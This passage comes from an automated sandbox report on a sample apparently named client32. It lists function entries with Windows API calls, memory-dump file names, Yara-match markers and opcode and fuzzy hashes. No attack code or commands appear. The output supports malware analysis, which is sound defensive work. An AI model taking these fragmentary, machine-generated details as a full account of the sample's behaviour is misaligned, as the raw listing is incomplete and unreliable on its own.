                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: HandleLibraryLoadModule
                                                        • String ID: NSMTRACE
                                                        • API String ID: 4133054770-4175627554
                                                        • Opcode ID: 6b55861aefcc65c005b9025e5622ee65095013122b0b6ef497348b2382dd5a01
                                                        • Instruction ID: b1ad380a61c778eddec6c5cf27d69e9270adaa7b109430301fabde4c5aba83a6
                                                        • Opcode Fuzzy Hash: 6b55861aefcc65c005b9025e5622ee65095013122b0b6ef497348b2382dd5a01
                                                        • Instruction Fuzzy Hash: 4BD012766552178BCF555A59A458764F7A8A64551F3400479DC25D5608EB30E0008F50
                                                        Function 11024B20 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(psapi.dll,?,1102E824), ref: 11024B28
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID: psapi.dll
                                                        • API String ID: 1029625771-80456845
                                                        • Opcode ID: b279cfa9485dd3d843c5fad48a844f53d245e61bccd7eeaeb87f5d1cde24b26e
                                                        • Instruction ID: a49634711d735b4a264a9b105b6216e45b9c68ec107dc904bdc89f91bbe56f72
                                                        • Opcode Fuzzy Hash: b279cfa9485dd3d843c5fad48a844f53d245e61bccd7eeaeb87f5d1cde24b26e
                                                        • Instruction Fuzzy Hash: 43E009B1901B108FC3B0CF3A9844642BBF0FB086503118E3EE0AEC3A00E330A548CF90
                                                        Function 6C803A70 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(psapi.dll,?,6C807708), ref: 6C803A78
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3755108701.000000006C801000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C800000, based on PE: true
                                                        • Associated: 0000000B.00000002.3755083319.000000006C800000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755174428.000000006C847000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755197287.000000006C848000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755197287.000000006C84C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755242929.000000006C84F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_6c800000_client32.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID: psapi.dll
                                                        • API String ID: 1029625771-80456845
                                                        • Opcode ID: 626af475e0b489b49d0607378075431aad060d740aaea553ee34b5ccd583b844
                                                        • Instruction ID: 09e6a29e0cb649e0a62b1af69a353f073a8e0e002372db9d57f7144f4071e6c6
                                                        • Opcode Fuzzy Hash: 626af475e0b489b49d0607378075431aad060d740aaea553ee34b5ccd583b844
                                                        • Instruction Fuzzy Hash: D5E001B1A01B218F83B0CF7AA504646BAF0BB096103119E3ED09EC3B00E334AA458FC0
                                                        Function 1105B4C0 Relevance: 3.2, APIs: 2, Instructions: 169COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
                                                          • Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
                                                          • Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7
                                                        • std::exception::exception.LIBCMT ref: 1105B563
                                                        • __CxxThrowException@8.LIBCMT ref: 1105B578
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                        • String ID:
                                                        • API String ID: 1338273076-0
                                                        • Opcode ID: 1b5560830ccb74d44574dce0668a09696c272e29ec4a79bf687cb658f92f3a9e
                                                        • Instruction ID: dbfd585634f4dcca31f1a65116c528cbeeec74a75ffab873033d2eb26059fac1
                                                        • Opcode Fuzzy Hash: 1b5560830ccb74d44574dce0668a09696c272e29ec4a79bf687cb658f92f3a9e
                                                        • Instruction Fuzzy Hash: 1F51BF76A00649AFCB44CF58D840E9AFBE9EF49314F14856EEC199B340D775F900CBA0
                                                        Function 1106F8F0 Relevance: 3.1, APIs: 2, Instructions: 80COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 1106F94F
                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,11182201,?), ref: 1106F9B9
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeLibrary_memset
                                                        • String ID:
                                                        • API String ID: 1654520187-0
                                                        • Opcode ID: 236fcb1ff3e935db34e9d19d6ac7a4d3679b670c088639da643021d7e105519a
                                                        • Instruction ID: b4d7e124ec2e4c11198bc400b01424f54d7072c10aa60f823e9ba30096ca7848
                                                        • Opcode Fuzzy Hash: 236fcb1ff3e935db34e9d19d6ac7a4d3679b670c088639da643021d7e105519a
                                                        • Instruction Fuzzy Hash: BD218676E0021CA7D710DE95DC40BDFFBACFB59350F4045AAE90997200D7315A55CBE1
                                                        Function 6C804750 Relevance: 3.1, APIs: 2, Instructions: 66COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ioctlsocket.WSOCK32(937B54B7,4004667F,00000000,-000391A4), ref: 6C8047DF
                                                        • select.WSOCK32(00000001,?,00000000,?,00000000,937B54B7,4004667F,00000000,-000391A4), ref: 6C804822
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3755108701.000000006C801000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C800000, based on PE: true
                                                        • Associated: 0000000B.00000002.3755083319.000000006C800000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755174428.000000006C847000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755197287.000000006C848000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755197287.000000006C84C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755242929.000000006C84F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_6c800000_client32.jbxd
                                                        Similarity
                                                        • API ID: ioctlsocketselect
                                                        • String ID:
                                                        • API String ID: 1457273030-0
                                                        • Opcode ID: 695f85a805a316685ddb4345295488aeb6e3e4730592b991ba20b949c8d8252d
                                                        • Instruction ID: b4ebac9079f1e09069603cf0878cfa26b8ddb73d7b574f1c670d4e2319e97719
                                                        • Opcode Fuzzy Hash: 695f85a805a316685ddb4345295488aeb6e3e4730592b991ba20b949c8d8252d
                                                        • Instruction Fuzzy Hash: 62213371A002188BEB28CF18C9547DDB7B9EB85304F0085EAA40D9B641D7745F94CF90
                                                        Function 1105A560 Relevance: 3.0, APIs: 2, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _malloc_memmove
                                                        • String ID:
                                                        • API String ID: 1183979061-0
                                                        • Opcode ID: 3c3ea54d01e18f5980f76814a4a1cb213ace576d82b2a0984105e2d45a008ece
                                                        • Instruction ID: 6b2ba473f0f9fecf01fc659cc140292f3dfe021f1a80db6f3ab8bc208d22101f
                                                        • Opcode Fuzzy Hash: 3c3ea54d01e18f5980f76814a4a1cb213ace576d82b2a0984105e2d45a008ece
                                                        • Instruction Fuzzy Hash: 5DF0A479A00252AF97818F2D9844C97BBDCDF4A15C30484A6F955CB312D631ED0587E0
                                                        Function 11082CA0 Relevance: 3.0, APIs: 2, Instructions: 42COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 11082CBF
                                                        • InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,1106B543,00000000,00000000,1117066E,000000FF), ref: 11082D30
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalInitializeSection_memset
                                                        • String ID:
                                                        • API String ID: 453477542-0
                                                        • Opcode ID: 816619bd5292480784461fccd4379953b6d04930cd08cba2fa59dc4f2141ea10
                                                        • Instruction ID: 47d3f0b7005f24d88c5ba47056aa192fd225d793499904ccbf0e969ed53c4eab
                                                        • Opcode Fuzzy Hash: 816619bd5292480784461fccd4379953b6d04930cd08cba2fa59dc4f2141ea10
                                                        • Instruction Fuzzy Hash: 721157B1901B048FC3A4CF7A88817C7FBE5BB49311F80892E95EEC2200DB716560CF90
                                                        Function 11133890 Relevance: 3.0, APIs: 2, Instructions: 34windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 111338B1
                                                        • ExtractIconExA.SHELL32(?,00000000,0004041F,0001043F,00000001), ref: 111338E8
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExtractFileIconModuleName
                                                        • String ID:
                                                        • API String ID: 3911389742-0
                                                        • Opcode ID: 336059a513dda44203e69ba7318e9ebe477f3c8b73331cb78105c2dcabdbca92
                                                        • Instruction ID: d4a943c9381133178395c29230453ef0d97f3a1f5bc1fa0403f3ff13df378306
                                                        • Opcode Fuzzy Hash: 336059a513dda44203e69ba7318e9ebe477f3c8b73331cb78105c2dcabdbca92
                                                        • Instruction Fuzzy Hash: 54F0B479A041186FEB08DF60CC9BFBDF3A8E784708F80C66DED52961C4CEB029448B40
                                                        Function 111522A1 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 11157CCF: __getptd_noexit.LIBCMT ref: 11157CCF
                                                        • __lock_file.LIBCMT ref: 111522E8
                                                          • Part of subcall function 11159979: __lock.LIBCMT ref: 1115999E
                                                        • __fclose_nolock.LIBCMT ref: 111522F3
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                        • String ID:
                                                        • API String ID: 2800547568-0
                                                        • Opcode ID: c6b8653c850ed822458d0e8f4dbe2789ca03e628ce26c4628c0bda2659fbdc38
                                                        • Instruction ID: b4dba51b1251756d021d203fd4787ec9a19dcc6820a565d6ebdbe948f49b8c94
                                                        • Opcode Fuzzy Hash: c6b8653c850ed822458d0e8f4dbe2789ca03e628ce26c4628c0bda2659fbdc38
                                                        • Instruction Fuzzy Hash: BBF0903A811607DEDBD09B7588007DEFBA09F0333CF108344E438AA1D0DB786A429F56
                                                        Function 6C804E60 Relevance: 3.0, APIs: 2, Instructions: 10sleepnetworkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • WSACancelBlockingCall.WSOCK32 ref: 6C804E69
                                                        • Sleep.KERNEL32(00000032), ref: 6C804E73
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3755108701.000000006C801000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C800000, based on PE: true
                                                        • Associated: 0000000B.00000002.3755083319.000000006C800000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755174428.000000006C847000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755197287.000000006C848000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755197287.000000006C84C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755242929.000000006C84F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_6c800000_client32.jbxd
                                                        Similarity
                                                        • API ID: BlockingCallCancelSleep
                                                        • String ID:
                                                        • API String ID: 3706969569-0
                                                        • Opcode ID: b2cfbbf4e4914294731165def32e1c6a363d0ca7f80b3cb9e69e583529cd6e43
                                                        • Instruction ID: 9a99c746948e08471bbff718b0d466d285f3cd816a56df3cb70a6f25417664a5
                                                        • Opcode Fuzzy Hash: b2cfbbf4e4914294731165def32e1c6a363d0ca7f80b3cb9e69e583529cd6e43
                                                        • Instruction Fuzzy Hash: 1CB092703D224106ABB012B80F183AA20D96BE426EFA09C70B945C9E85EF20C104E1A1
                                                        Function 11134260 Relevance: 2.6, APIs: 2, Instructions: 58sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 11134180: ExpandEnvironmentStringsA.KERNEL32(75A3795C,?,00000104,75A3795C), ref: 111341A7
                                                          • Part of subcall function 111524D7: __fsopen.LIBCMT ref: 111524E4
                                                        • GetLastError.KERNEL32(?,00000000,75A3795C,00000000), ref: 11134295
                                                        • Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,75A3795C,00000000), ref: 111342A5
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
                                                        • String ID:
                                                        • API String ID: 3768737497-0
                                                        • Opcode ID: 4d6c099333632b985558e77fdbfed47ff203cda0402669eff27874c5330c3e1c
                                                        • Instruction ID: c387f289c61fefa2e5298b52aaefc30f01b1045fb1e2ae40e0bebc4dd9c1f7d1
                                                        • Opcode Fuzzy Hash: 4d6c099333632b985558e77fdbfed47ff203cda0402669eff27874c5330c3e1c
                                                        • Instruction Fuzzy Hash: 96114C7AD40109AFDB518FD4D984EAFFB78EB8626AF010164EC04A7604D730AD4087E2
                                                        Function 11010900 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 110109B4
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LockitLockit::_std::_
                                                        • String ID:
                                                        • API String ID: 3382485803-0
                                                        • Opcode ID: 1385057775134fbb1bc964ec1c8f376cb1cd366a7f35dc4fb300ae432e8f24af
                                                        • Instruction ID: 45c645539fb1ee64975a99796d46acc60ecc28b62f5a4bb4ed7206e1cf6f0728
                                                        • Opcode Fuzzy Hash: 1385057775134fbb1bc964ec1c8f376cb1cd366a7f35dc4fb300ae432e8f24af
                                                        • Instruction Fuzzy Hash: 1C518D75B00645DFDB00CF98C990AADBBF6BF89718F24829DD5469B385C736E902CB90
                                                        Function 11132450 Relevance: 1.6, APIs: 1, Instructions: 70registryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110291B,75A38400,?,?,1113451F,00000000,CSDVersion,00000000,00000000,?), ref: 11132470
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
